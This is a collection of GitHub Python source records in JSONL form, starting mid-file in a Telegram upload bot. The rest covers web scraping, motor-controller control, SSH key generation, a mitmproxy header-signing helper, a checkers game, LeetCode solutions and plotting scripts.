datetime.now()\n time_taken_for_download = (end_one - start).seconds\n dir_contents = len(os.listdir(tmp_directory_for_each_user))\n # dir_contents.sort()\n await update.message.edit_caption(\n caption=f\"Found {dir_contents} File.\\n\\nNow Uploading to Telegram be Patient...\\n\"\n )\n user_id = update.from_user.id\n #\n final_response = await upload_to_tg(\n update.message,\n tmp_directory_for_each_user,\n user_id,\n {},\n True\n )\n LOGGER.info(final_response)\n #\n try:\n shutil.rmtree(tmp_directory_for_each_user)\n except:\n pass\n #\n message_to_send = \"\"\n for key_f_res_se in final_response:\n local_file_name = key_f_res_se\n l_f_name = local_file_name.replace(\"_\", \" \")\n message_id = final_response[key_f_res_se]\n channel_id = str(update.message.chat.id)[4:]\n private_link = f\"https://t.me/c/{channel_id}/{message_id}\"\n message_to_send += \"­ЪЊЇ \"\n message_to_send += l_f_name\n message_to_send += \"\"\n message_to_send += \"\\n\"\n if message_to_send != \"\":\n mention_req_user = f\"Your Requested Files\\n\\n\"\n message_to_send = mention_req_user + message_to_send\n message_to_send = message_to_send + \"\\n\" + \"­ЪЈЁPOWERED BY : @APDLEECHBOX\\n#UPLOADED\"\n else:\n message_to_send = \"FAILED to Upload Files. 
+{"seq_id":"2134107059","text":"import requests\nfrom bs4 import BeautifulSoup\n\n\n\nurl = 'https://www.globo.com/?utm_source=barraGCOM'\nresponse = requests.get(url)\nhtml = BeautifulSoup(response.text, 'html.parser')\n\n\nfor texto in html.select('.headline__container'):\n    t = texto.select_one('.post__link')\n    d = texto.select_one('.post__title')\n\n\n\n    # select_one() returns None when the node is missing, so guard before using .text\n    if t is not None:\n        print(t, t.text, sep='\\t')\n","repo_name":"muriloeduardo199/webscrepy","sub_path":"web_scraping/scraping.py","file_name":"scraping.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"}
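# --- Editor's illustrative sketch (not part of the dataset records): when scraping,
# select_one() returns None for missing nodes, so guard before touching .text.
# Parsing a fixed HTML snippet keeps the example reproducible; the real globo.com
# markup can change at any time:
from bs4 import BeautifulSoup

html = BeautifulSoup(
    '<div class="headline__container">'
    '<a class="post__link" href="/x"><h2 class="post__title">Hello</h2></a>'
    '</div>',
    'html.parser',
)
for container in html.select('.headline__container'):
    link = container.select_one('.post__link')
    title = container.select_one('.post__title')
    if link is not None and title is not None:
        print(title.text, link['href'], sep='\t')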
+{"seq_id":"18780160704","text":"\"\"\"\npythonnet_template\n==================\n\nAn example written to show control of a BSC101 stepper motor controller.\n\"\"\"\nimport os\nimport time\nimport sys\nimport clr\n\nclr.AddReference(\"C:\\\\Program Files\\\\Thorlabs\\\\Kinesis\\\\Thorlabs.MotionControl.DeviceManagerCLI.dll\")\nclr.AddReference(\"C:\\\\Program Files\\\\Thorlabs\\\\Kinesis\\\\Thorlabs.MotionControl.GenericMotorCLI.dll\")\nclr.AddReference(\"C:\\\\Program Files\\\\Thorlabs\\\\Kinesis\\\\Thorlabs.MotionControl.Benchtop.StepperMotorCLI.dll\")\nfrom Thorlabs.MotionControl.DeviceManagerCLI import *\nfrom Thorlabs.MotionControl.GenericMotorCLI import *\nfrom Thorlabs.MotionControl.Benchtop.StepperMotorCLI import *\nfrom System import Decimal # necessary for real world units\n\ndef main():\n    \"\"\"The main entry point for the application\"\"\"\n\n    # Uncomment this line if you are using simulations\n    # SimulationManager.Instance.InitializeSimulations()\n\n    try:\n\n        DeviceManagerCLI.BuildDeviceList()\n\n        # create new device\n        serial_no = \"40000001\" # Replace this line with your device's serial number\n\n        # Connect, begin polling, and enable\n        device = BenchtopStepperMotor.CreateBenchtopStepperMotor(serial_no)\n        device.Connect(serial_no)\n        time.sleep(0.25) # wait statements are important to allow settings to be sent to the device\n\n        # For benchtop devices, get the channel\n        channel = device.GetChannel(1)\n\n        # Ensure that the device settings have been initialized\n        if not channel.IsSettingsInitialized():\n            channel.WaitForSettingsInitialized(10000) # 10 second timeout\n            assert channel.IsSettingsInitialized() is True\n\n        # Start polling and enable\n        channel.StartPolling(250) #250ms polling rate\n        time.sleep(0.25) # give polling a moment to start\n        channel.EnableDevice()\n        time.sleep(0.25) # Wait for device to enable\n\n        # Get Device Information and display description\n        device_info = channel.GetDeviceInfo()\n        print(device_info.Description)\n\n        # Load any configuration settings needed by the controller/stage\n        channel_config = channel.LoadMotorConfiguration(serial_no) # If using BSC203, change serial_no to channel.DeviceID. \n        chan_settings = channel.MotorDeviceSettings\n\n        channel.GetSettings(chan_settings)\n\n        channel_config.DeviceSettingsName = 'HS NRT150 Enc Stage 150mm'\n\n        channel_config.UpdateCurrentConfiguration()\n\n        channel.SetSettings(chan_settings, True, False)\n\n        # Get parameters related to homing/zeroing/other\n\n        # Home or Zero the device (if a motor/piezo)\n        print(\"Homing Motor\")\n        channel.Home(60000)\n        print(\"Done\")\n        # Move the device to a new position\n        channel.SetMoveRelativeDistance(Decimal(5.0))\n\n        print(\"Moving 10 times\")\n        for i in range(10):\n            channel.MoveRelative(10000)\n            time.sleep(5)\n        print(\"Done\")\n\n        # Stop Polling and Disconnect\n        channel.StopPolling()\n        device.Disconnect()\n\n    except Exception as e:\n        # this can be bad practice: It sometimes obscures the error source\n        print(e)\n\n    # Uncomment this line if you are using Simulations\n    # SimulationManager.Instance.UninitializeSimulations()\n    ...\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"Thorlabs/Motion_Control_Examples","sub_path":"Python/Benchtop/BSC101/bsc101_pythonnet.py","file_name":"bsc101_pythonnet.py","file_ext":"py","file_size_in_byte":3273,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"43"}
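# --- Editor's illustrative sketch (not part of the dataset records): the Thorlabs
# example above only reaches StopPolling()/Disconnect() when nothing in the try
# block raises first. Wrapping the motion in try/finally guarantees the cleanup
# runs either way; `device` and `channel` are assumed to be the objects built in
# that record, so this is a definition-only sketch:
def run_moves(device, channel, moves=10):
    try:
        for _ in range(moves):
            channel.MoveRelative(10000)  # timeout in ms, as in the record
    finally:
        # always stop polling and release the device, even after a failed move
        channel.StopPolling()
        device.Disconnect()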
+{"seq_id":"9880954788","text":"from cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.primitives.asymmetric import rsa\nfrom cryptography.hazmat.backends import default_backend\nimport os\nfrom app.common import ensure_dir\n\ndef generate_keys(path):\n    # generate private/public key pair\n    key = rsa.generate_private_key(backend=default_backend(), public_exponent=65537, key_size=2048)\n\n    # get public key in PEM container format (PKCS1, not OpenSSH)\n    public_key = key.public_key().public_bytes(serialization.Encoding.PEM, serialization.PublicFormat.PKCS1)\n\n    # get private key in PEM container format\n    pem = key.private_bytes(encoding=serialization.Encoding.PEM,\n                            format=serialization.PrivateFormat.TraditionalOpenSSL,\n                            encryption_algorithm=serialization.NoEncryption())\n\n    # decode to printable strings\n    private_key_str = pem.decode('utf-8')\n    public_key_str = public_key.decode('utf-8')\n\n    ensure_dir(path)\n\n    private_key_path = os.path.join(path, \"id_rsa\")\n    with open(private_key_path, \"w\") as w:\n        w.write(private_key_str)\n    os.chmod(private_key_path, 0o600)\n    with open(os.path.join(path, \"id_rsa.pub\"), \"w\") as w:\n        w.write(public_key_str)\n\n    return private_key_str, public_key_str\n","repo_name":"guysoft/fedigroup","sub_path":"src/app/make_ssh_key.py","file_name":"make_ssh_key.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"43"}
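# --- Editor's illustrative sketch (not part of the dataset records): the record
# above writes id_rsa.pub as PEM/PKCS1, although files named id_rsa.pub normally
# hold the OpenSSH encoding. cryptography can emit that encoding directly (recent
# versions no longer need an explicit backend argument):
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import rsa

key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
ssh_pub = key.public_key().public_bytes(
    serialization.Encoding.OpenSSH,
    serialization.PublicFormat.OpenSSH,
)
print(ssh_pub.decode('utf-8'))  # "ssh-rsa AAAA..."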
+{"seq_id":"41813476732","text":"# implementation of stack using list\nstack = []\n\nprint('1. Push\\n2. Pop\\n3. Display elements of stack')\n\nwhile True:\n    choice = int(input(\"Enter your choice: \"))\n    if choice == 1:\n        elem = input(\"Enter your element which you want to push: \")\n        stack.append(elem)\n    elif choice == 2:\n        if not stack:\n            print(\"Stack is empty... cannot delete element\")\n        else:\n            print(\"Deleted element is: \" + stack.pop())\n    elif choice == 3:\n        for i in range(len(stack) - 1, -1, -1):\n            print(stack[i])\n    else:\n        print(\"Wrong input !!\")\n","repo_name":"mr-vaibh/python-payroll","sub_path":"PRACTICAL-FILES/others/3-stack.py","file_name":"3-stack.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"}
+{"seq_id":"23741714983","text":"#630510642\n#Wachiranan Phuangpanya\n#section002\n#Lab07_5\n\ndef rotate(num,pos):\n    x = find_count(num) # number of digits in num\n    if pos >=0: # positive pos: rotate right\n        for i in range(1,pos+1):\n            r = num%10\n            num2 = num//10\n            num = (r*(10**(x-1)))+num2 # move the last digit to the front\n        return num\n    else: # negative pos: rotate left\n        for i in range(1,abs(pos)+1):\n            r = num%(10**(x-1))\n            num2 = num//(10**(x-1)) # split off the leading digit\n            num = (r*10)+num2 # move the first digit to the end\n        return num\n    \n\n\n\ndef find_count(num): # count the digits of the entered number\n    count = 0\n    while num !=0:\n        num = num//10\n        count += 1\n    return count\n    \n    \n    \ndef main():\n    n = int(input()) # read num\n    p = int(input()) # read pos\n    print(rotate(n,p)) # show the result\n    \n\n\n\nif __name__=='__main__':\n    main()\n","repo_name":"WachirananNot/204111-Fundamentals-Of-Programming","sub_path":"Lab07/Lab07_5_630510642.py","file_name":"Lab07_5_630510642.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"}
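# --- Editor's illustrative sketch (not part of the dataset records): the digit
# rotation in the lab above can be cross-checked with string slicing, since
# rotating the digits of a number is just rotating its decimal representation:
def rotate_str(num, pos):
    s = str(num)
    pos %= len(s)  # normalize; a negative pos becomes an equivalent right rotation
    return int(s[-pos:] + s[:-pos]) if pos else num

assert rotate_str(12345, 1) == 51234   # rotate right by one
assert rotate_str(12345, -1) == 23451  # rotate left by one
# note: like the lab's arithmetic version, leading zeros collapse (100 -> 10)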
+{"seq_id":"10253624666","text":"from typing import Optional # needed for the annotation below; `import math` was unused\n# Definition for a binary tree node.\nclass TreeNode:\n    def __init__(self, val=0, left=None, right=None):\n        self.val = val\n        self.left = left\n        self.right = right\n\n# A binary tree in which the left and right subtrees of every node differ \n# in height by no more than 1.\nclass Solution:\n    def isBalanced(self, root: Optional[TreeNode]) -> bool:\n        temp = [True]\n        if not root: \n            return temp[0]\n        \n        def rec(node: TreeNode) -> int: \n            if not node: # an empty subtree\n                return 0\n            \n            leftHeight = rec(node.left)\n            rightHeight = rec(node.right)\n            \n            if abs(leftHeight - rightHeight) > 1: \n                temp[0] = False \n            \n            return 1 + max(leftHeight, rightHeight)\n        \n        rec(root)\n        return temp[0]","repo_name":"apekshik/leetcode","sub_path":"110. Balanced Binary Tree.py","file_name":"110. Balanced Binary Tree.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"}
+{"seq_id":"1695933049","text":"# https://graphviz.readthedocs.io/en/stable/manual.html\nfrom graphviz import Digraph\nfrom pathlib import Path\n\nclass PlotGraph:\n    \"Plot graph from a set of nodes and a list of edges\"\n\n    def __call__(self, nodes, edges, path_save: str):\n        # Create an empty graph\n        self.digraph = Digraph(\"Pangeblock\")\n\n        nodes_plot = [self.node2str(node) for node in nodes]\n        edges_plot = [(self.node2str(edge[0]), self.node2str(edge[1])) for edge in edges]\n        self.digraph = self.create_dot_graph(self.digraph, nodes_plot, edges_plot)\n        \n        path_save = Path(path_save)\n        if path_save.suffix == \".dot\":\n            path_save.parent.mkdir(parents=True, exist_ok=True)\n            self.save_as_dot(path_save)\n        else: \n            # raising a plain string is a TypeError; raise a real exception instead\n            raise ValueError(\"Path not valid, must be a '.dot' file\")\n        \n\n    def create_dot_graph(self, graph, nodes, edges):\n        \"Create graph in 'dot' language to be plotted\"\n        # Add nodes to the graph\n        for node in nodes: \n            graph.node(node)\n        # Add edges to the graph\n        for edge in edges: \n            u, v = edge\n            graph.edge(u, v)\n\n        return graph\n\n    def show(self, graph):\n        \"Print graph\"\n        # self.create_dot_graph(self.nodes, self.edges)\n        return graph # self.digraph\n\n    def save_as_dot(self, path_save: str = \"graph.dot\"):\n        \"Save tree as .dot file to generate plot with graphviz\"\n        self.digraph.render(filename=path_save)\n\n    def node2str(self, node):\n        return f\"K=({','.join(str(_) for _ in node.K)}),i={node.i},j={node.j},{node.label}\"","repo_name":"AlgoLab/pangeblocks","sub_path":"src/graph/plot_graph.py","file_name":"plot_graph.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"}
+{"seq_id":"1970869792","text":"import logging\nimport hashlib\nfrom urllib.parse import urlparse\nfrom mitmproxy import http\n\n# The users\n\nusers = {\n    \"1\": {\n        \"client_id\": \"0388941f\",\n        \"salt\": \"vinegar\"\n    },\n    \"2\": {\n        \"client_id\": \"4be75c87\",\n        \"salt\": \"tabasco\"\n    },\n    \"3\": {\n        \"client_id\": \"12345678\",\n        \"salt\": \"hendos\"\n    }\n}\n\ndef gen_hash(path, client_id, salt, body):\n    return hashlib.sha256((path+client_id+body+salt).encode('utf-8')).hexdigest()\n\ndef request(flow: http.HTTPFlow) -> None:\n    if 'user-id' in flow.request.headers:\n        user_id = flow.request.headers['user-id']\n        logging.info (\"User-id: \" + user_id)\n\n        # The user ID -1 means do not add a header so just bail out now\n        if user_id == \"-1\":\n            return\n\n        # See if we know about the requested user, if so, use it, if not, default to user 1\n        if user_id in users:\n            logging.info (\"Using user \" + user_id)\n            user = users[user_id]\n        else:\n            logging.info (\"Unknown user requested, using user 1\")\n            user = users[\"1\"]\n    else:\n        logging.info (\"No user supplied, using user 1\")\n        user = users[\"1\"]\n\n    url_parsed = urlparse(flow.request.url)\n    path = url_parsed.path\n    logging.info (\"URL: \" + flow.request.url)\n    logging.info (\"Path: \" + path)\n    logging.info (\"Client ID: \" + user[\"client_id\"])\n    logging.info (\"Salt: \" + user[\"salt\"])\n\n    # GET requests have an empty body so don't need to check\n    # if GET or other method\n    body = flow.request.content.decode(\"utf-8\")\n    logging.info (\"Body: \" + body)\n\n    token = gen_hash (path, user[\"client_id\"], user[\"salt\"], body)\n    logging.info (\"Token: \" + token)\n\n    if \"bearer\" in flow.request.headers:\n        logging.info 
(\"Bearer token already passed, not modifying it\")\n else:\n flow.request.headers[\"bearer\"] = token\n\n if \"client-id\" in flow.request.headers:\n logging.info (\"Client ID already passed, not modifying it\")\n else:\n flow.request.headers[\"client-id\"] = user['client_id']\n","repo_name":"digininja/bearer_injection","sub_path":"multiuser.py","file_name":"multiuser.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"43"} +{"seq_id":"11444764653","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport re\n\nGAME_BOARD = \"\"\"\n A B C D E F G H\n +—————————————————+\n1 | {} {} {} {} {} {} {} {} |\n2 | {} {} {} {} {} {} {} {} |\n3 | {} {} {} {} {} {} {} {} |\n4 | {} {} {} {} {} {} {} {} |\n5 | {} {} {} {} {} {} {} {} |\n6 | {} {} {} {} {} {} {} {} |\n7 | {} {} {} {} {} {} {} {} |\n8 | {} {} {} {} {} {} {} {} |\n +—————————————————+\n\"\"\"\n\nALPHA = [\"A\", \"B\", \"C\", \"D\", \"E\", \"F\", \"G\", \"H\"]\n\nPLAYER_ONE = \"Player One\"\nPLAYER_TWO = \"Player Two\"\n\nBLACK_SQUARE = \"■\"\nWHITE_SQUARE = \".\"\n\nBLACK = \"x\"\nWHITE = \"o\"\nBLACK_KINGED = \"X\"\nWHITE_KINGED = \"O\"\n\nKINGED_MOVES = (-1, -1), (-1, 1), (1, 1), (1, -1)\nBLACK_MOVES = (-1, -1), (-1, 1)\nWHITE_MOVES = (1, 1), (1, -1)\n\nWHITE_PIECES = (WHITE, WHITE_KINGED)\nBLACK_PIECES = (BLACK, BLACK_KINGED)\n\nWHITE_START_POSITIONS = [\n (0, 1), (0, 3), (0, 5), (0, 7),\n (1, 0), (1, 2), (1, 4), (1, 6),\n (2, 1), (2, 3), (2, 5), (2, 7)\n]\n\nBLACK_START_POSITIONS = [\n (5, 0), (5, 2), (5, 4), (5, 6),\n (6, 1), (6, 3), (6, 5), (6, 7),\n (7, 0), (7, 2), (7, 4), (7, 6),\n]\n\n\ndef display_board(board):\n current_board = [board[(x, y)] for x in range(8) for y in range(8)]\n print(GAME_BOARD.format(*current_board))\n\n\ndef setup_board(board):\n for position in WHITE_START_POSITIONS:\n board[position] = WHITE\n for position in BLACK_START_POSITIONS:\n board[position] = BLACK\n\n\ndef get_piece_moves(player, piece):\n if piece in (WHITE_KINGED, BLACK_KINGED):\n return KINGED_MOVES\n elif player is PLAYER_ONE:\n return BLACK_MOVES\n elif player is PLAYER_TWO:\n return WHITE_MOVES\n\n\ndef is_legal_move(board, player, piece_coordinate, move_coordinate):\n possible_piece_moves = get_piece_moves(player, board[piece_coordinate])\n return move_coordinate in allowed_moves_for_piece(\n board, player, piece_coordinate, possible_piece_moves\n )\n\n\ndef is_white_piece(board, coordinate):\n return board[coordinate] in WHITE_PIECES\n\n\ndef is_black_piece(board, coordinate):\n return board[coordinate] in BLACK_PIECES\n\n\ndef is_in_board_bounds(x, y):\n return 0 <= x <= 7 and 0 <= y <= 7\n\n\ndef allowed_moves_for_piece(board, player, piece_coordinate, possible_move_coordinates):\n x, y = piece_coordinate\n allowed_moves = []\n for move_coordinate in possible_move_coordinates:\n move = (x + move_coordinate[0], y + move_coordinate[1])\n if not is_in_board_bounds(*move):\n continue\n if player is PLAYER_ONE:\n if is_white_piece(board, move):\n move = (move[0] + move_coordinate[0], move[1] + move_coordinate[1])\n if not is_in_board_bounds(*move) or board[move] != BLACK_SQUARE:\n continue\n elif is_black_piece(board, move):\n continue\n elif player is PLAYER_TWO:\n if is_black_piece(board, move):\n move = (move[0] + move_coordinate[0], move[1] + move_coordinate[1])\n if not is_in_board_bounds(*move) or board[move] != BLACK_SQUARE:\n continue\n pass\n elif is_white_piece(board, move):\n continue\n if board[move] == BLACK_SQUARE:\n 
allowed_moves.append(move)\n            continue\n\n    return allowed_moves\n\n\ndef get_capturing_moves_for_piece(\n    board, player, piece_coordinate, possible_move_coordinates\n):\n    x, y = piece_coordinate\n    capturing_moves = []\n    for move_coordinate in possible_move_coordinates:\n        move = (x + move_coordinate[0] * 2, y + move_coordinate[1] * 2)\n        if not is_in_board_bounds(*move):\n            continue\n        if board[move] != BLACK_SQUARE:\n            continue\n        capture_coordinates = get_capture_coordinates(move, piece_coordinate)\n        if player is PLAYER_ONE and can_capture_piece(\n            board, capture_coordinates, WHITE_PIECES\n        ):\n            capturing_moves.append(move)\n        elif player is PLAYER_TWO and can_capture_piece(\n            board, capture_coordinates, BLACK_PIECES\n        ):\n            capturing_moves.append(move)\n\n    return capturing_moves\n\n\ndef make_move(board, piece_coordinate, move_coordinate):\n    board[move_coordinate], board[piece_coordinate] = (\n        board[piece_coordinate],\n        board[move_coordinate],\n    )\n\n\ndef is_current_player_piece(board, player, coordinate):\n    if player is PLAYER_ONE:\n        return board[coordinate] in BLACK_PIECES\n    elif player is PLAYER_TWO:\n        return board[coordinate] in WHITE_PIECES\n\n\ndef select_piece(board, player):\n    user_input = None\n    while (\n        user_input is None\n        or not is_valid_coordinate(user_input)\n        or not is_black_square(*get_move_coordinates(user_input))\n        or not is_current_player_piece(board, player, get_move_coordinates(user_input))\n    ):\n        user_input = clean_input(input(\"{} select piece to move: \".format(player)))\n\n    return get_move_coordinates(user_input)\n\n\ndef enter_move(board, player, piece):\n    user_input = None\n    while (\n        user_input is None\n        or not is_valid_coordinate(user_input)\n        or not is_legal_move(board, player, piece, get_move_coordinates(user_input))\n    ):\n        user_input = clean_input(input(\"{} enter your move: \".format(player)))\n\n    return get_move_coordinates(user_input)\n\n\ndef clean_input(string):\n    return string.strip().upper()\n\n\ndef is_valid_coordinate(move):\n    # rows are labelled 1-8, so reject 0 and 9 up front\n    return re.match(r\"^[1-8][a-hA-H]$\", move) is not None\n\n\ndef get_move_coordinates(move):\n    return int(move[0]) - 1, alpha_to_coordinate(move[1])\n\n\ndef alpha_to_coordinate(char):\n    return ALPHA.index(char.upper())\n\n\ndef is_black_square(x, y):\n    return (x + y) % 2 != 0\n\n\ndef switch_players(current_player):\n    if current_player == PLAYER_ONE:\n        return PLAYER_TWO\n    elif current_player == PLAYER_TWO:\n        return PLAYER_ONE\n\n\ndef can_capture_piece(board, capture_coordinates, opponents_pieces):\n    return board[capture_coordinates] in opponents_pieces\n\n\ndef get_capture_coordinates(move_coordinate, piece_coordinate):\n    # integer division: board keys are (int, int) tuples, so / 2 would\n    # produce floats and raise KeyError on lookup\n    return (\n        (piece_coordinate[0] + move_coordinate[0]) // 2,\n        (piece_coordinate[1] + move_coordinate[1]) // 2,\n    )\n\n\ndef has_captured_piece(move_coordinate, piece_coordinate):\n    if abs(piece_coordinate[0] - move_coordinate[0]) == 1:\n        return False\n    return True\n\n\ndef capture_piece(board, piece_coordinate, move_coordinate):\n    capture = get_capture_coordinates(move_coordinate, piece_coordinate)\n    board[capture] = BLACK_SQUARE\n\n\ndef get_board_square(x, y):\n    return BLACK_SQUARE if is_black_square(x, y) else WHITE_SQUARE\n\n\ndef choose_follow_up_move(capturing_moves):\n    if not capturing_moves:\n        return None\n\n    # Todo: handle forced capturing moves\n    # Allow choice if multiple pieces can be captured\n    allowed_follow_ups = [coordinates_to_string(*move) for move in capturing_moves]\n    print(\", \".join(allowed_follow_ups))\n    user_input = None\n    while (\n        user_input is None\n        or not 
is_valid_coordinate(user_input)\n        or user_input not in allowed_follow_ups\n    ):\n        user_input = clean_input(input(\"Select a follow up capture: \"))\n\n    return capturing_moves[allowed_follow_ups.index(user_input)]\n\n\ndef count_pieces(board):\n    white_piece_count = 0\n    black_piece_count = 0\n    for coordinate in board:\n        if board[coordinate] in BLACK_PIECES:\n            black_piece_count += 1\n        elif board[coordinate] in WHITE_PIECES:\n            white_piece_count += 1\n    return black_piece_count, white_piece_count\n\n\ndef make_kinged_piece(board, current_player, moved_to_coordinate, piece_coordinate):\n    if moved_to_coordinate is None:\n        moved_to_coordinate = piece_coordinate\n    # compare values with ==; `is 0` only works by accident of CPython int caching\n    if current_player is PLAYER_ONE and moved_to_coordinate[0] == 0:\n        board[moved_to_coordinate] = BLACK_KINGED\n    elif current_player is PLAYER_TWO and moved_to_coordinate[0] == 7:\n        board[moved_to_coordinate] = WHITE_KINGED\n\n\ndef follow_up_player_move(board, current_player, moved_to_coordinate, piece_coordinate):\n    while moved_to_coordinate is not None and has_captured_piece(\n        moved_to_coordinate, piece_coordinate\n    ):\n        capture_piece(board, piece_coordinate, moved_to_coordinate)\n        possible_move_coordinates = get_piece_moves(\n            current_player, board[moved_to_coordinate]\n        )\n        capturing_moves = get_capturing_moves_for_piece(\n            board, current_player, moved_to_coordinate, possible_move_coordinates\n        )\n        follow_up_coordinate = choose_follow_up_move(capturing_moves)\n        if follow_up_coordinate is not None:\n            make_move(board, moved_to_coordinate, follow_up_coordinate)\n            capture_piece(board, moved_to_coordinate, follow_up_coordinate)\n        piece_coordinate = moved_to_coordinate\n        moved_to_coordinate = follow_up_coordinate\n    return moved_to_coordinate, piece_coordinate\n\n\ndef initial_player_move(board, current_player):\n    display_board(board)\n    piece_coordinate = select_piece(board, current_player)\n    moved_to_coordinate = enter_move(board, current_player, piece_coordinate)\n    make_move(board, piece_coordinate, moved_to_coordinate)\n    return moved_to_coordinate, piece_coordinate\n\n\ndef coordinates_to_string(x, y):\n    return str(x + 1) + ALPHA[y]\n\n\ndef play():\n    current_player = PLAYER_ONE\n    board = {(x, y): get_board_square(x, y) for x in range(8) for y in range(8)}\n    setup_board(board)\n    while True:\n        moved_to_coordinate, piece_coordinate = initial_player_move(\n            board, current_player\n        )\n        moved_to_coordinate, piece_coordinate = follow_up_player_move(\n            board, current_player, moved_to_coordinate, piece_coordinate\n        )\n        make_kinged_piece(board, current_player, moved_to_coordinate, piece_coordinate)\n        black_piece_count, white_piece_count = count_pieces(board)\n\n        if white_piece_count == 0:\n            print(\"Player one wins\")\n            break\n\n        if black_piece_count == 0:\n            print(\"Player two wins\")\n            break\n\n        current_player = switch_players(current_player)\n\n\nif __name__ == '__main__':\n    play()\n","repo_name":"OrderAndCh4oS/checkers","sub_path":"play_checkers/play.py","file_name":"play.py","file_ext":"py","file_size_in_byte":10279,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"}
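# --- Editor's illustrative sketch (not part of the dataset records): in the checkers
# record above a jump lands two squares past the captured piece, so the capture sits
# at the midpoint of the jump. Floor division keeps the result usable as a key into
# the (int, int)-keyed board dict, which is why get_capture_coordinates uses //:
def midpoint(a, b):
    return ((a[0] + b[0]) // 2, (a[1] + b[1]) // 2)

jump_from, jump_to = (5, 0), (3, 2)
captured = midpoint(jump_from, jump_to)
assert captured == (4, 1)                           # the jumped square
assert all(isinstance(c, int) for c in captured)    # valid board key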
+{"seq_id":"33094565343","text":"#\n# @lc app=leetcode id=896 lang=python3\n#\n# [896] Monotonic Array\n#\nfrom typing import List\n# @lc code=start\nclass Solution:\n    def isMonotonic(self, A: List[int]) -> bool:\n        n = len(A)\n        dirc = 0\n        if n<=1:\n            return True\n        for i in range(1,n):\n            if A[i]<A[i-1]:\n                if dirc == 0 or dirc==1:\n                    dirc = 1\n                else:\n                    return False\n            if A[i]>A[i-1]:\n                if dirc == 0 or dirc==-1:\n                    dirc = -1\n                else:\n                    return False\n        return True\n\n    def isMonotonic2(self, nums):\n        n = len(nums)\n        if n<=1:\n            return True\n        inc = True\n        dec = True\n        for i in range(1, n):\n            inc &= (nums[i - 1] <= nums[i])\n            dec &= (nums[i - 1] >= nums[i])\n            if not inc and not dec:\n                return False\n        return True\n\n# @lc code=end\n\nA = [1,2,4,5]\nA = [1,3,2]\nA = [6,5,4,4]\n# A = [1,2,2,3]\nA = []\nA = [1,1]\n\n\nres = Solution().isMonotonic2(A)\nprint(res)","repo_name":"szr22/algorithm","sub_path":"leetcode/896.monotonic-array.py","file_name":"896.monotonic-array.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"}
+{"seq_id":"9378597170","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Dec 21 19:25:48 2015\r\n\r\n@author: Lily\r\n\"\"\"\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n\r\nplt.close(1)\r\nplt.close(2)\r\nplt.close(3)\r\nm = np.loadtxt(r\"D:\\UNQ\\IACI\\1_PTZ\\PYTHON\\Camera\\calibratorResults.txt\", skiprows=1)\r\n\r\nplt.figure(1)\r\nplt.plot(m[:,0], m[:,1], 'bs', label='fx')\r\nplt.plot(m[:,0], m[:,2], 'rs', label='fy')\r\nplt.plot(m[:,0], m[:,1], 'b', m[:,0], m[:,2], 'r')\r\nplt.title('Zoom vs f')\r\nplt.xlabel('zoom [%]')\r\nplt.ylabel('fx, fy [pixel]')\r\nplt.legend(loc=2)\r\ndeg = 1\r\np = np.polyfit(m[:,0], m[:,2],deg)\r\nplt.text(40,10000, 'y = ' + str(p[0]) + 'x + ' + str(p[1]))\r\nplt.show()\r\n\r\nplt.figure(2)\r\nplt.plot(m[:,0], m[:,3], 'bs', label='fovx')\r\nplt.plot(m[:,0], m[:,4], 'rs', label='fovy')\r\nplt.plot(m[:,0], m[:,3], 'b', m[:,0], m[:,4], 'r')\r\nplt.title('Zoom vs fov')\r\nplt.xlabel('zoom [%]')\r\nplt.ylabel('fovx, fovy [º]')\r\nplt.legend(loc=1)\r\ndeg = 2\r\np = np.polyfit(m[:,0], m[:,3],deg)\r\nplt.text(15,5, 'y = ' + str(p[0]) + 'x^2 + ' + str(p[1]) + 'x + ' + str(p[2]))\r\np = np.polyfit(m[:,0], m[:,4],deg)\r\nplt.text(20,45, 'y = ' + str(p[0]) + 'x^2 + ' + str(p[1]) + 'x + ' + str(p[2]))\r\n\r\nplt.show()\r\n\r\nplt.figure(3)\r\nplt.plot(m[:,0], m[:,5], 'gs', label='focalLength')\r\nplt.plot(m[:,0], m[:,5], 'g')\r\nplt.title('Zoom vs focalLength')\r\nplt.xlabel('zoom [%]')\r\nplt.ylabel('focalLength [mm]')\r\nplt.legend(loc=1)\r\ndeg = 1\r\np = np.polyfit(m[:,0], m[:,5],deg)\r\nplt.text(20,5, 'y = ' + str(p[0]) + 'x + ' + str(p[1]))\r\nplt.show()\r\n\r\n\r\n#deg = 1\r\n#p = np.polyfit(m[:,0], m[:,5],deg)\r\n## p(x) = p[0] * x**deg + ... 
